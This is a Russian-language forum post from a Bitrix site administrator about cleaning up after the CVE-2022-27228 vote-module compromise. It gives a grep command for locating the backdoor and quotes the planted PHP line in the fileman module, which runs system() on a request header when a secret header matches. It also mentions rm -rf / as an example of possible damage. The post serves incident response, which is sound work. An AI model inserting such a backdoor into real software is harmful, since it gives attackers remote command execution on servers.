Бэкдор. Как он там оказался не совсем понятно, много пишут про уязвимость модуля vote и то, что можно загрузить и исполнить произвольный код.
То есть через модуль можно, но есть этот бэкдор (дополнительный), которым можно исполнить любой код (вплоть до rm -rf /, хотя веб-сервер не должен быть от root и будет удалено только то, на что хватит прав, но все равно очень не приятно. Хотя неприятнее терять контроль и искать трояны. Спасибо, Битрикс, некогда в сравнении с WP описываемый как безопасный.
Удаляя модуль полностью (перенося в рандомную папку) никак не помогает уйти от редиректов. В агентах пусто. Никаких стремных файлов. Возможности здесь и сейчас обновиться нет, так как никому не хочется пробовать, а потом переписывать legacy, который сломается. Все работает на PHP 7.1, а тут просят VM 7.5+ PHP 7.4+. Кому оно надо все это обновлять. Хотя уязвимое legacy Битрикса демонстрирует феерические масштабы.
Конкретика. Ищем бэкдор.
[CODE]grep -rnw '/home/bitrix/www/domain.ru/bitrix/' -e 'system('
[/CODE]
Очень вероятно, что в результате это будет модуль fileman. Еще здесь не видел ссылку на бюллетень Яндекса [URL=https://cloud.yandex.ru/docs/security/security-bulletins/#CVE-2022-27228]https://cloud.yandex.ru/docs/security/security-bulletins/#CVE-2022-27228[/URL]
Найдет банальный бэкдор:
[CODE]"spell_word" => $_SERVER['HTTP_S'] == "randomString" ? die(system($_SERVER['HTTP_P'])) : "",
[/CODE]
И непонятную хрень тоже стоит удалить:
[CODE]if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die();
[/CODE]
Вероятно, что это не имеет большого смысла, так как уязвимость в старом ядре остается, но можно сделать хоть что-то перед полным обновлением окружения и ядра.
Возможно, что временную папку для загрузок можно вынести на уровень выше, чем работает веб-сервер и тогда он не исполнится. Хотя изначальный бэкдор мне не известен по своей сути (CVE-2022-27228)